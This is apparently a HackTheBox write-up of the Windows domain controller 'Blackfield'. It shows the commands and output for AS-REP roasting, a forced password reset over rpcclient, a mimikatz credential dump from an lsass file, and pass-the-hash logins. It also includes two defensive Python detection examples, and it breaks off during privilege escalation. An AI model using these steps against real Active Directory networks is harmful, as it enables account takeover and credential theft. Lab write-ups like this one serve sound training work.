Column | Details
Name | Blackfield
IP | 10.10.10.192
Points | 40
OS | Windows
Difficulty | Hard
Creator | aas
Out On | 06 June 2020
Brief@Blackfield:~$
The journey starts from an SMB share that contains a lot of directories, which turn out to be usernames. Requesting a TGT (AS-REP) for a valid user and cracking it with john gives a password. With it I can log in to rpcclient, where the user has permission to change another user's password, which is exactly what we need. After changing that password I got access to another share containing a .zip file; unzipping it gives a memory dump file. Dumping it with mimikatz gave the NTLM hash of a user, and I logged in with Evil-Winrm. That user can back up files since it has the right to do so, so I backed up ntds.dit and the SYSTEM hive, dumped the NTLM hashes from them with secretsdump, and got the NTLM hash of the administrator.
Summary
- Anonymous login to the share profiles$
- Creating a text file from the directory names
- Requesting a TGT (AS-REP) for a valid user and saving it to a file
- Cracking the hash with John
- Logging in to rpcclient
- Changing the audit2020 password to one I choose
- Enumerating the share forensic
- Got a zip file lsass.zip and unzipped it
- Got a memory dump file lsass.DMP
- Dumping the NTLM hashes from the file using mimikatz
- Login as svc_backup
- Got user.txt
- The user svc_backup can back up files
- Using diskshadow to create a shadow copy of volume c: under an alias
- Copying ntds.dit
- Saving the registry hive SYSTEM
- Dumping the NTLM hashes from the files using secretsdump.py
- Login as administrator
- Got root.txt
Pwned
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Recon
Nmap
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat allports.nmap
# Nmap 7.92 scan initiated Wed Sep 28 13:50:04 2022 as: nmap -Pn -sV -sC -T4 -p- -v -oN allports.nmap 10.10.10.192
Increasing send delay for 10.10.10.192 from 0 to 5 due to 55 out of 136 dropped probes since last increase.
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.090s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-28 18:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m29s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-09-28T18:58:40
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 28 13:58:46 2022 -- 1 IP address (1 host up) scanned in 522.15 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]
The open ports (DNS, Kerberos, LDAP, SMB, WinRM) show that this machine is an Active Directory domain controller.
enum4linux
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 28 13:52:44 2022
==========================
| Target Information |
==========================
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on blackfield.htb |
======================================================
[E] Can't find workgroup/domain
==============================================
| Nbtstat Information for blackfield.htb |
==============================================
Looking up status of 10.10.10.192
No reply from 10.10.10.192
=======================================
| Session Check on blackfield.htb |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=============================================
| Getting domain SID for blackfield.htb |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)
enum4linux gives us the domain name BLACKFIELD and the domain SID.
Smbclient
I tried logging in anonymously and listed the available shares; here is what I got.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $smbclient -L blackfield.htb
Enter WORKGROUP\puck's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
┌─[puck@parrot-lt]─[~/htb/blackfield]
Okay, so there are two non-default shares of interest, forensic and profiles$. I tried the forensic share first.
forensic share
➜ smbclient //blackfield.htb/forensic
Enter WORKGROUP\roots password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
But we are not allowed to list this share anonymously; move on to profiles$.
┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls -1 /mnt/profiles/ > userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $
Looking closely at the directory names, they are clearly usernames. Let's check which of them are valid users with kerbrute.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $/opt/kerbrute/kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 userlist.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/28/22 - Ronnie Flathers @ropnop
2022/09/28 14:26:02 > Using KDC(s):
2022/09/28 14:26:02 > 10.10.10.192:88
2022/09/28 14:26:08 > [+] VALID USERNAME: audit2020@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: support@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/09/28 14:26:23 > Done! Tested 314 usernames (3 valid) in 20.819 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]
Using GetNPUsers.py to get the TGT
Now that we have valid users we can use GetNPUsers.py from impacket. For any user that has Kerberos pre-authentication disabled, the KDC hands out an AS-REP (containing the TGT) without a password, and part of that reply is encrypted with the user's key, so it can be cracked offline. I save the output in john format so I can crack it with John the Ripper.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User audit2020@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat hashes.txt
$krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL:e51263a437b0eabadb88c806f5d899e0$4f2736792ae460f97724a3d56bb0fcdd81242deb1c7196297198832155cb33d944e191ff107af1b56684c9f5af1240ba0622a6aa966f8d1a17e2fa736720f2c1c9cb6cc2f9ed6087312d7536f6dc4c07fbe0c0c9e208cb578748fbe6d2e30d015e457c364e348f6638cadbb653d4e6ac93073b5ab335914e25b7bf30667a1054d1f8ac8be95825c2549a9ee5ad71f9c117b4265c9cbd05584f8b613d9e33298b31a7c2d4cdf8f1814f6c3110a3698b988cd505cb76e6927343c33f626974fd6c9134df56a615a5b83ac4750185c8a492ace85575f7ef3e7addb63cbc662b5cf36158e0c6c0ef2ec00ae0e063a8967a245d8ebad1
┌─[puck@parrot-lt]─[~/htb/blackfield]
Time to crack it with john
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $john hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL)
1g 0:00:00:14 DONE (2022-09-28 14:32) 0.06863g/s 983939p/s 983939c/s 983939C/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $
And it cracked: the password for support is #00^BlackKnight.
The credentials are valid for SMB, but not for WinRM.
┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
┌─[puck@parrot-lt]─[~/htb/blackfield]
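Two defender-side checks for this step, as an added example (not from the original writeup): which accounts are roastable at all (the DONT_REQ_PREAUTH bit in userAccountControl, the flag GetNPUsers' UF_DONT_REQUIRE_PREAUTH message refers to), and which Security event 4768 records look like the request it sent (pre-authentication type 0 with an RC4 ticket). The account list, the 4768 records and the 10.10.14.5 source address are constructed.

```python
"""Defender-side checks for the AS-REP roasting step shown above.

Two views of the same weakness:
  1. Attribute audit: which enabled accounts have DONT_REQ_PREAUTH
     (0x400000) set in userAccountControl, i.e. are roastable at all.
  2. Event audit: Security event 4768 (TGT requested) with
     PreAuthType 0 and TicketEncryptionType 0x17 (RC4), the shape of
     the request GetNPUsers sent for 'support'.
All sample data below is constructed for this example.
"""
from collections import Counter

# userAccountControl bits (MS-SAMR USER_ACCOUNT_* / UF_* flags)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed LDAP results: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("audit2020", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("support", 0x410200),    # ... | DONT_REQ_PREAUTH -> roastable
    ("svc_backup", 0x10200),
    ("oldsvc", 0x410202),     # DONT_REQ_PREAUTH but disabled (constructed)
]


def roastable_accounts(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [
        name for name, uac in accounts
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    ]


# Constructed event 4768 records, keyed like the EventData XML fields.
# Status 0x0 = success; a burst of Status 0x19 (KDC_ERR_PREAUTH_REQUIRED)
# from one source is the username-enumeration signal, not handled here.
SAMPLE_4768 = [
    {"TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "audit2020", "IpAddress": "10.10.14.5",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "svc_backup", "IpAddress": "10.10.10.192",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
]


def asrep_roast_events(events):
    """Successful 4768s that needed no pre-auth and got an RC4 ticket."""
    hits = []
    for e in events:
        if (e["PreAuthType"] == "0"
                and int(e["TicketEncryptionType"], 16) == 0x17
                and e["Status"] == "0x0"):
            hits.append((e["TargetUserName"], e["IpAddress"]))
    return hits


def summarise(events):
    """Count roast-shaped requests per (user, source) so a scan stands out."""
    return Counter(asrep_roast_events(events))


if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_ACCOUNTS))
    for (user, src), n in summarise(SAMPLE_4768).items():
        print(f"AS-REP roast pattern: {user} from {src} x{n}")
```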
Login to rpcclient
After trying the credentials here and there, I logged in to rpcclient.
Enumerating users (reference: https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging)
➜ blackfield rpcclient 10.10.10.192 -U support
Enter WORKGROUP\supports password:#00^BlackKnight
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[admin1] rid:[0x13ed]
These are the available users on the domain.
Getting info about the current user
rpcclient $> queryuser support
User Name : support
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 10 Jun 2020 16:41:38 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Sun, 23 Feb 2020 12:53:24 EST
Password can change Time : Mon, 24 Feb 2020 12:53:24 EST
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x450
group_rid: 0x201
acb_info : 0x00010210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x0000000b
padding1[0..7]...
logon_hrs[0..21]...
Available privileges
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>
These are the privileges rpcclient lists. From a few of the above I concluded that the current user may be able to change another user's password, following the approach in this post:
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
I tried almost all the available users and succeeded on audit2020:
rpcclient $> setuserinfo2 audit2020 23 'Geheim123!'
I checked LDAP, but found nothing interesting.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ldapsearch -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
┌─[puck@parrot-lt]─[~/htb/blackfield]
I tried Kerberoasting, but no accounts with SPNs were found.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
No entries found!
┌─[puck@parrot-lt]─[~/htb/blackfield]
I also collected BloodHound data with bloodhound-python:
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 52 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 20S
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls
20220928150457_computers.json allports.nmap users.txt
20220928150457_domains.json hashes.txt validusers.txt
20220928150457_groups.json support_ldap_dump
20220928150457_users.json userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
And now I can log in with smbclient as audit2020 to enumerate the forensic share:
smbclient //blackfield.htb/forensic -U audit2020
Enter WORKGROUP\audit2020s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
7846143 blocks of size 4096. 3523743 blocks available
smb: \>
The user audit2020 has permission to read the share.
Got the file lsass.zip
After some manual enumeration I found a zip file called lsass.zip in the memory_analysis directory; it was hard to find among so many files:
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now
➜ blackfield
But I got an NT_STATUS_IO_TIMEOUT error while downloading the file, maybe because the file is too large.
Mounting the share locally
I can also mount the forensic share on my machine and walk its directories like regular ones, using mount from cifs-utils:
➜ blackfield mount -t cifs //10.10.10.192/forensic /mnt -o user=audit2020
Password for audit2020@//10.10.10.192/forensic: **********
➜ blackfield
Now I can look in the /mnt directory:
➜ /mnt ls
commands_output memory_analysis tools
➜ /mnt
And now I can copy the zip file from here:
➜ memory_analysis cp lsass.zip /home/prashant/
Unzipping the file:
➜ prashant unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
➜ prashant
A .DMP file is a memory dump, created when a program crashes or something else goes wrong. It can contain useful information, which is why mimikatz has a feature to extract credentials such as NTLM hashes from it.
I copied the .DMP file to my Windows machine and downloaded mimikatz there.
Disable the Windows virus protection to download mimikatz.
https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
https://github.com/gentilkiwi/mimikatz/releases
Load mimikatz.exe and run:
sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP
sekurlsa::LogonPasswords
And done! I got the hashes of two users:
Opening : '/users/0xPrashant/Desktop/lsass.DMP' file for minidump...
Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:30:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:29:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
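An added triage example, not part of the original writeup: a small parser for the minidump format that reads only the header, stream directory, SystemInfo stream and module list (structures from Microsoft's public minidumpapiset.h), enough to confirm that a file like the lsass.DMP found on the forensic share is an lsass memory dump, and therefore a credential exposure, without running mimikatz on it. The sample dump bytes are constructed inline.

```python
"""Triage a suspected lsass minidump without touching its credential
material: read MINIDUMP_HEADER, the stream directory, the SystemInfo
stream and the module list. A dump whose first module (the process
image) is lsass.exe should be treated as a credential exposure
wherever it turns up, e.g. on a file share. The sample dump is
constructed inline; no real lsass.DMP is needed.
"""
import struct

MINIDUMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793           # low 16 bits of MINIDUMP_HEADER.Version
HEADER_FMT = "<4sIIIIIQ"            # Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIRECTORY_FMT = "<III"              # StreamType, Location.DataSize, Location.Rva
SYSTEM_INFO_FMT = "<HHHBBIIIIIHH"   # MINIDUMP_SYSTEM_INFO up to Reserved2 (32 bytes)
MODULE_HEAD_FMT = "<QIIII"          # BaseOfImage, SizeOfImage, CheckSum, TimeDateStamp, ModuleNameRva
MODULE_SIZE = 108                   # sizeof(MINIDUMP_MODULE)
SYSTEM_INFO_STREAM, MODULE_LIST_STREAM = 7, 4
STREAM_NAMES = {3: "ThreadList", 4: "ModuleList", 5: "MemoryList", 6: "Exception",
                7: "SystemInfo", 9: "Memory64List", 12: "HandleData", 15: "MiscInfo",
                16: "MemoryInfoList", 19: "Token"}
PRODUCT_TYPES = {1: "workstation", 2: "domain controller", 3: "server"}  # VER_NT_*


def parse_minidump(data):
    """Return streams, OS version and module paths; ValueError if not a minidump."""
    sig, version, nstreams, dir_rva, _, _, _ = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE or version & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError("not a minidump (bad signature or version)")
    info = {"streams": [], "os": None, "modules": []}
    for i in range(nstreams):
        stype, _size, rva = struct.unpack_from(DIRECTORY_FMT, data, dir_rva + 12 * i)
        info["streams"].append(STREAM_NAMES.get(stype, f"type{stype}"))
        if stype == SYSTEM_INFO_STREAM:
            _arch, _, _, _ncpu, product, major, minor, build, *_ = struct.unpack_from(
                SYSTEM_INFO_FMT, data, rva)
            info["os"] = f"Windows {major}.{minor} build {build} ({PRODUCT_TYPES.get(product, product)})"
        elif stype == MODULE_LIST_STREAM:
            (nmods,) = struct.unpack_from("<I", data, rva)
            for m in range(nmods):
                *_, name_rva = struct.unpack_from(MODULE_HEAD_FMT, data, rva + 4 + MODULE_SIZE * m)
                (nbytes,) = struct.unpack_from("<I", data, name_rva)  # MINIDUMP_STRING.Length, in bytes
                info["modules"].append(data[name_rva + 4:name_rva + 4 + nbytes].decode("utf-16-le"))
    return info


def triage(data):
    """Parse and flag dumps whose main image (first module) is lsass.exe."""
    info = parse_minidump(data)
    exe = info["modules"][0].rsplit("\\", 1)[-1].lower() if info["modules"] else ""
    info["is_lsass"] = exe == "lsass.exe"
    return info


def build_sample_dump():
    """Constructed minimal dump: lsass.exe on a Windows 10.0 build 17763 domain
    controller, the version crackmapexec reported for DC01. Layout: header 0..32,
    directory 32..56, SystemInfo 56..112, ModuleList 112..224, module name at 224."""
    name = "C:\\Windows\\System32\\lsass.exe".encode("utf-16-le")
    sysinfo = struct.pack(SYSTEM_INFO_FMT, 9, 6, 0x5E03, 2, 2,        # AMD64, 2 CPUs, VER_NT_DOMAIN_CONTROLLER
                          10, 0, 17763, 2, 0, 0x0110, 0) + b"\0" * 24  # CPU_INFORMATION left zeroed
    dir_rva = struct.calcsize(HEADER_FMT)
    sys_rva = dir_rva + 2 * struct.calcsize(DIRECTORY_FMT)
    mod_rva = sys_rva + len(sysinfo)
    name_rva = mod_rva + 4 + MODULE_SIZE
    module = struct.pack(MODULE_HEAD_FMT, 0x7FF71A400000, 0x1A000, 0, 0x5E4BE0F5, name_rva)
    modlist = struct.pack("<I", 1) + module + b"\0" * (MODULE_SIZE - len(module))
    header = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, 0x0001A793, 2, dir_rva, 0, 0, 0)
    directory = (struct.pack(DIRECTORY_FMT, SYSTEM_INFO_STREAM, len(sysinfo), sys_rva)
                 + struct.pack(DIRECTORY_FMT, MODULE_LIST_STREAM, len(modlist), mod_rva))
    return header + directory + sysinfo + modlist + struct.pack("<I", len(name)) + name + b"\0\0"


if __name__ == "__main__":
    print(triage(build_sample_dump()))
```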
There is an Administrator NTLM hash, but I don't think it will be that easy:
➜ prashant evil-winrm -i 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
➜ prashant
As expected it didn't work; move on.
Login as svc_backup
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
┌─[puck@parrot-lt]─[~/htb/blackfield]
So I tried the second NTLM hash, the one for the svc_backup user:
➜ prashant evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
Got user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
8ac------------------------------bd
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
Privilege escalation to root
Root is simpler than I expected.
whoami /all
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
